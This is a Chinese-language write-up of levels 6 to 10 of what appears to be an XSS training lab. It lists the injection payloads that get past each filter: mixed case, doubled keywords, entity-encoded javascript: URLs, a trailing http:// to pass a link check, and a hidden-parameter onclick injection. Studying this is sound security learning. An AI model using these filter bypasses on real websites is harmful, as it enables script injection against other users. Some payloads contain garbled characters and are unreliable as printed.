继续进行6-10关
第6关
简单的尝试之后发现闭合掉了
尝试空格或者大小写,tab绕过,大小写成功绕过" Onclick="alert(1)
第七关
老样子
value=""> click='alert(1)">
value=""><>alert(1)</>">
value=""><a =java:alert(1)>123</a>">
闭合的一塌糊涂。这里是直接吧敏感的标签删除了,比如删除了on,script直接删掉了。既然删除,那么容易想到双写绕过,删除之后恰好剩下我们想要的内容" oonnclick="alert(1)
script可以通过同样的方法绕过,这里不再举例,大家可以试一试。
第8关
<a href="' o_nclick='alert(1)">友情链接</a></center>
我们输入的会直接在href标签内输出构成锚点链接,这里只要能都在=后边输入弹窗就ok类似于第五关。但是script被无情闭合掉了
双写大小写一样没防住了。这里我们可以换一些新思路,例用html代码绕过,把被检测的标签经过编码之后可以逃过去。
https://www.qqxiuzi.cn/bianma/zifushiti.php
比如这里它检测了script,我们可以把script经过编码得到
script
前后加上java:、alert(1)即可。
javascript:alert(1)
当然之更改个别字母,或者全更改也可。
第9关
梅开二度测试,发现提示链接不合法,经过多次尝试,发现链接需要包含http://加上就好了
payload=javascript:alert(/xss/)//http://
第10关
这一关有点搞,
源码发现有三个输入点被hidden了(在html标签中,意思为隐藏)
尝试分别向他们传参,
?t_link=1 &t_history=1&t_sort=1
可以看到t_sort成功的输出了,接下来就好办了
?t_sort=" οnclick=alert(1) type="text
此处后边加上type=text 的目的是为了令输入框显示出来,可以触发“onclick”这一事件,当然可以搭配别的标签,不用后边加type